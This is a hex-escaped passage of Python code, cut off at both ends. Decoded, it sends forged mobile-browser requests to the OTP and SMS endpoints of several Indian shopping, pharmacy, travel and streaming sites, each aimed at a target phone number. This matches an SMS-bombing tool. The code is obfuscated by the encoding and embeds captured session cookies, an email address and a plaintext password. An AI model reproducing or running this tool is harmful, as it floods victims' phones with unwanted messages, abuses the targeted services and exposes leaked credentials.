\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x70\x67\x72\x61\x64\x65\x2d\x69\x6e\x73\x65\x63\x75\x72\x65\x2d\x72\x65\x71\x75\x65\x73\x74\x73\x27\x3a\x20\x27\x31\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x27\x6d\x62\x6c\x27\x3a\x20\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x73\x6d\x73\x2f\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x37\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c
\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x77\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x2f\x73\x6f\x63\x69\x61\x6c\x6c\x6f\x67\x69\x6e\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x6c\x6f\x67\x69\x6e\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e
\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x73\x65\x63\x74\x69\x6f\x6e\x5f\x64\x61\x74\x61\x5f\x69\x64\x73\x3d\x25\x37\x42\x25\x32\x32\x63\x61\x72\x74\x25\x32\x32\x25\x33\x41\x31\x35\x36\x30\x32\x33\x39\x37\x35\x31\x25\x37\x44\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x2f\x73\x6f\x63\x69\x61\x6c\x6c\x6f\x67\x69\x6e\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x73\x65\x6e\x64\x6f\x74\x70\x2f\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x73\x65\x6e\x74\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x39\x37\x39\x39\x32\x38\x33\x31\x39\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x36\x36\x36\x32\x37\x30\x32\x31\x36\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x56\x27\x3a\x20\x27\x32\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31
\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x36\x39\x31\x33\x2e\x31\x35\x32\x38\x33\x34\x39\x37\x32\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x74\x6f\x5f\x6c\x77\x69\x64\x27\x3a\x20\x27\x64\x39\x31\x62\x65\x61\x33\x61\x2d\x37\x36\x31\x30\x2d\x34\x35\x61\x61\x2d\x38\x66\x37\x38\x2d\x36\x35\x61\x30\x64\x37\x34\x30\x66\x62\x34\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x50\x75\x73\x68\x53\x75\x62\x73\x63\x72\x69\x62\x65\x72\x53\x74\x61\x74\x75\x73\x27\x3a\x20\x27\x44\x45\x4e\x49\x45\x44\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x70\x65\x63\x6c\x6f\x73\x65\x64\x27\x3a\x20\x27\x74\x72\x75\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x27\x3a\x20\x27\x67\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x53\x30\x31\x38\x63\x63\x35\x39\x33\x27\x3a\x20\x27\x30\x31\x65\x66\x36\x31\x61\x65\x64\x30\x66\x63\x61\x31\x31\x30\x66\x35\x30\x64\x38\x65\x33\x62\x65\x32\x63\x36\x36\x65\x62\x38\x33\x31\x38\x38\x66\x36\x64\x66\x38\x34\x39\x35\x63\x30\x65\x64\x32\x63\x64\x37\x37\x32\x38\x32\x39\x33\x37\x30\x66\x63\x31\x32\x36\x39\x30\x39\x35\x34\x61\x61\x64\x30\x38\x33\x34\x66\x35\x34\x35\x62\x35\x37\x37\x36\x34\x34\x36\x37\x64\x62\x62\x36\x36\x65\x66\x62\x30\x35\x64\x34\x38\x31\x61\x38\x39\x35\x38\x61\x65\x62\x62\x32\x37\x33\x37\x35\x31\x39\x35\x36\x65\x66\x39\x65\x62\x33\x38\x33\x61\x33\x62\x61\x32\x32\x64\x64\x31\x63\x39\x34\x64\x38\x32\x30\x32\x31\x65\x39\x64\x34\x63\x34\x30\x30\x31\x31\x64\x34\x61\x62\x39\x62\x64\x39\x37\x63\x36\x66\x30\x61\x37\x34\x36\x32\x38\x61\x63\x31\x32\x65\x38\x66\x37\x62\x63\x62\x36\x36\x33\x63\x31\x36\x30\x38\x65\x37\x32\x38\x38\x65\x62\x64\x32\x35\x32\x30\x35\x31\x63\x62\x38\x34\x64\x65\x66\x33\x62\x30\x32\x31\x64\x33\x62\x63\x66\x36\x34\x33\x64\x33\x66\x33\x37\x32\x38\x63\x61\x39\x63\x30\x64\x39\x63\x37\x38\x30\x64\x31\x37\x31\x35\x37\x38\x62\x61\x39\x36\x36\x37\x37\x34
\x66\x31\x31\x61\x63\x34\x34\x38\x36\x34\x61\x37\x66\x33\x64\x61\x35\x39\x37\x39\x31\x63\x62\x35\x35\x66\x32\x37\x34\x31\x66\x32\x33\x64\x37\x32\x66\x37\x38\x34\x33\x65\x66\x65\x39\x33\x30\x36\x34\x35\x39\x63\x30\x30\x65\x63\x32\x65\x35\x66\x30\x30\x30\x36\x35\x37\x32\x39\x61\x38\x35\x37\x33\x62\x61\x62\x61\x34\x32\x33\x38\x34\x62\x62\x37\x63\x66\x34\x36\x65\x62\x35\x35\x63\x66\x38\x39\x66\x37\x32\x66\x31\x64\x63\x64\x35\x36\x31\x39\x61\x32\x36\x65\x34\x66\x66\x33\x32\x63\x36\x33\x64\x30\x36\x63\x61\x63\x38\x63\x34\x62\x62\x31\x35\x38\x64\x61\x36\x36\x34\x30\x62\x63\x30\x62\x31\x31\x31\x39\x33\x31\x33\x34\x63\x62\x66\x33\x38\x30\x35\x30\x61\x65\x30\x64\x62\x32\x33\x30\x61\x61\x32\x35\x38\x62\x31\x31\x38\x31\x37\x34\x39\x66\x62\x30\x33\x37\x33\x61\x66\x65\x30\x34\x31\x61\x64\x31\x61\x65\x66\x66\x64\x30\x63\x30\x38\x62\x65\x37\x61\x36\x32\x30\x31\x30\x64\x62\x30\x32\x63\x63\x36\x35\x65\x64\x66\x62\x31\x33\x34\x31\x64\x32\x64\x65\x35\x34\x63\x64\x66\x34\x37\x35\x63\x35\x64\x63\x64\x38\x34\x65\x31\x36\x63\x36\x34\x63\x35\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x63\x5f\x55\x41\x2d\x36\x38\x30\x30\x32\x30\x33\x30\x2d\x31\x27\x3a\x20\x27\x31\x2e\x31\x35\x36\x30\x33\x36\x36\x31\x39\x37\x2e\x43\x6a\x30\x4b\x43\x51\x6a\x77\x78\x59\x4c\x6f\x42\x52\x43\x78\x41\x52\x49\x73\x41\x45\x66\x31\x36\x2d\x74\x78\x35\x55\x58\x72\x72\x50\x39\x53\x45\x68\x52\x38\x64\x50\x6b\x54\x4c\x34\x61\x39\x77\x6f\x45\x46\x37\x41\x65\x2d\x6b\x76\x53\x6c\x7a\x4b\x64\x67\x71\x33\x35\x79\x33\x31\x44\x65\x4b\x33\x5f\x75\x68\x67\x38\x61\x41\x6b\x52\x42\x45\x41\x4c\x77\x5f\x77\x63\x42\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x64\x69\x67\x69\x4d\x72\x6b\x74\x27\x3a\x20\x27\x75\x74\x6d\x5f\x73\x6f\x75\x72\x63\x65\x25\x33\x41\x25\x37\x43\x75\x74\x6d\x5f\x6d\x65\x64\x69\x75\x6d\x25\x33\x41\x25\x37\x43\x64\x65\x76\x69\x63\x65\x25\x33\x41\x6d\x6f\x62\x69\x6c\x65\x25\x37\x43\x65\x78\x70\x69\x72\x65\x73\x25\x33\x41\x46\x72\x69\x25\x32\x43\x25\x32\x30
\x31\x32\x25\x32\x30\x4a\x75\x6c\x25\x32\x30\x32\x30\x31\x39\x25\x32\x30\x31\x39\x25\x33\x41\x30\x33\x25\x33\x41\x31\x37\x25\x32\x30\x47\x4d\x54\x25\x37\x43\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x49\x6d\x70\x72\x65\x73\x73\x69\x6f\x6e\x43\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x69\x70\x27\x3a\x20\x27\x31\x30\x2e\x31\x2e\x31\x30\x2e\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x65\x73\x73\x69\x6f\x6e\x53\x74\x61\x74\x75\x73\x27\x3a\x20\x27\x74\x72\x75\x65\x7c\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x46\x69\x72\x73\x74\x50\x61\x67\x65\x27\x3a\x20\x27\x54\x68\x75\x20\x4a\x75\x6e\x20\x31\x33\x20\x32\x30\x31\x39\x20\x30\x30\x3a\x33\x33\x3a\x35\x33\x20\x47\x4d\x54\x2b\x30\x35\x33\x30\x20\x28\x49\x6e\x64\x69\x61\x20\x53\x74\x61\x6e\x64\x61\x72\x64\x20\x54\x69\x6d\x65\x29\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x64\x63\x5f\x67\x74\x6d\x5f\x55\x41\x2d\x36\x38\x30\x30\x32\x30\x33\x30\x2d\x31\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x49\x27\x3a\x20\x27\x6a\x6f\x68\x6e\x79\x61\x68\x6f\x25\x34\x30\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x53\x30\x31\x66\x65\x34\x32\x34\x39\x27\x3a\x20\x27\x30\x31\x65\x66\x36\x31\x61\x65\x64\x30\x39\x63\x33\x32\x63\x36\x61\x35\x33\x63\x65\x39\x65\x34\x33\x31\x61\x36\x61\x37\x31\x39\x63\x34\x31\x36\x38\x36\x37\x66\x32\x66\x33\x61\x64\x37\x31\x33\x66\x64\x65\x32\x65\x37\x34\x31\x37\x35\x62\x63\x32\x34\x38\x61\x63\x63\x37\x61\x35\x32\x33\x66\x34\x31\x65\x39\x37\x35\x31\x64\x30\x33\x32\x38\x35\x39\x61\x31\x35\x39\x62\x66\x66\x66\x38\x37\x36\x36\x34\x62\x39\x30\x63\x33\x64\x30\x61\x39\x64\x66\x62\x32\x33\x39\x32\x66\x37\x35\x38\x37\x36\x63\x63\x62\x65\x32\x37\x33\x62\x38\x61\x38\x65\x38\x31\x64\x37\x61\x38\x64\x32\x35\x30\x34\x37\x34\x35\x33
\x63\x31\x37\x61\x32\x39\x30\x35\x65\x63\x61\x37\x65\x66\x66\x32\x36\x62\x37\x38\x30\x63\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x34\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x2f\x73\x69\x67\x6e
\x75\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x66\x69\x72\x73\x74\x4e\x61\x6d\x65\x22\x3a\x22\x53\x70\x65\x65\x64\x58\x22\x2c\x22\x6c\x6f\x67\x69\x6e\x22\x3a\x22\x6a\x6f\x68\x6e\x79\x61\x68\x6f\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x22\x2c\x22\x70\x61\x73\x73\x77\x6f\x72\x64\x22\x3a\x22\x52\x6f\x63\x6b\x40\x35\x73\x74\x61\x72\x22\x2c\x22\x67\x65\x6e\x64\x65\x72\x54\x79\x70\x65\x22\x3a\x22\x4d\x61\x6c\x65\x22\x2c\x22\x6d\x6f\x62\x69\x6c\x65\x4e\x75\x6d\x62\x65\x72\x22\x3a\x22\x30\x30\x30\x30\x22\x2c\x22\x72\x65\x71\x75\x65\x73\x74\x54\x79\x70\x65\x22\x3a\x22\x53\x45\x4e\x44\x4f\x54\x50\x22\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x61\x75\x74\x68\x2f\x73\x69\x67\x6e\x75\x70\x53\x65\x6e\x64\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x5c\x22\x73\x74\x61\x74\x75\x73\x43\x6f\x64\x65\x5c\x22\x3a\x5c\x22\x31\x5c\x22\x22\x29\x20\x21\x3d\x20\x2d\x31\x3a\x0a\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x34\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x61\x70\x69\x2e\x63\x6c\x6f\x75\x64\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x20\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x74\x65\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x38\x39\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43
\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x74\x65\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x2f\x73\x75\x62\x73\x63\x72\x69\x62\x65\x3f\x70\x72\x6f\x67\x72\x65\x73\x73\x3d\x69\x6e\x70\x75\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x